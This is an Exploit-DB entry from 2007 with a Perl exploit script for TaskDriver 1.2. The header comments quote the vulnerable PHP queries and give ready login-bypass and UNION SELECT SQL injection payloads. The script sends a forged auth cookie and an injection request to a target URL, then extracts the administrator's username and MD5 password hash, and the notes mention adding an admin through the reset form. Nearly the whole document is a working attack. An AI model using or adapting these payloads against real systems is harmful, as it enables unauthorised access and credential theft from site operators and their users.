TaskDriver 1.2 - Authentication Bypass / SQL Injection

EDB-ID:

3896

Author:

Silentz

Type:

webapps

Platform:

PHP

Published:

2007-05-10

#!/usr/bin/perl -w

#################################################################################
#										#
#	      TaskDriver <= 1.2 Login Bypass/SQL Injection Exploit		#
#										#
# Discovered by: Silentz							#
# Payload: Login Bypass & Admin Username & Hash Retrieval			#
# Website: http://www.w4ck1ng.com						#
# 										#
# Vulnerable Code (login.php): 							#
#										#
# $sql = "SELECT * FROM  $userstable WHERE username = '$_POST[username]' AND    #
#         password = md5('$_POST[password]')";					#
#										#
# Vulnerable Code (notes.php):							#
#       									#
# $taskid = $_GET['taskid'];							#
# $sql = "SELECT * FROM $taskstable WHERE taskid = '$taskid'";			#
#										#
# PoC: http://victim.com/login.php						#
#      In username box input: ' OR 1=1 /*					#
#      In password box: [ANYTHING OR NOTHING]					#
#										#
#      OR: 									#
#										#
#      http://victim.com/notes.php?taskid=-999' UNION SELECT 0,0,username,      #
#      0,0,0,0,0,0,0,0,0,password FROM users WHERE userlevel='a' /*		#
# 										#
# Subject To: magic_quotes_gpc set to off					#
# GoogleDork: Get your own!							#
# Notes: You can do a UNION INSERT in the password reset form to add an admin	#
#										#
# Shoutz: The entire w4ck1ng community						#
#										#
#################################################################################

use LWP::UserAgent;
if (@ARGV < 1){
print "-------------------------------------------------------------------------\r\n";
print "           TaskDriver <= 1.2 Login Bypass/SQL Injection Exploit\r\n";
print "-------------------------------------------------------------------------\r\n";
print "Usage: w4ck1ng_taskdriver.pl [PATH]\r\n\r\n";
print "[PATH] = Path where TaskDriver is located\r\n\r\n";
print "e.g. w4ck1ng_taskdriver.pl http://victim.com/taskdriver/\r\n";
print "-------------------------------------------------------------------------\r\n";
print "            		 http://www.w4ck1ng.com\r\n";
print "            		        ...Silentz\r\n";
print "-------------------------------------------------------------------------\r\n";
exit();
}

$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$cookie = "fook%21%27+or+1%3D1+%2F%2A;";
$host = $ARGV[0] . "notes.php?taskid=-999' UNION SELECT 0,0,username,0,0,0,0,0,0,0,0,0,password FROM users WHERE userlevel='a' /*";

my @cookie = ('Cookie' => "auth=$cookie;");
my $res = $b->get($host, @cookie);

$answer = $res->content;
if ($answer =~ /notes on (.*?)<\/u><\/td><\/tr>/){
print "-------------------------------------------------------------------------\r\n";
print "            TaskDriver <= 1.2 Login Bypass/SQL Injection Exploit\r\n";
print "-------------------------------------------------------------------------\r\n";
print "[+] Admin User : $1\n";
}

if ($answer =~/([0-9a-fA-F]{32})<\/font>/){
print "[+] Admin Hash : $1\n";
print "-------------------------------------------------------------------------\r\n";
print "            		 http://www.w4ck1ng.com\r\n";
print "            		        ...Silentz\r\n";
print "-------------------------------------------------------------------------\r\n";
}

# milw0rm.com [2007-05-10]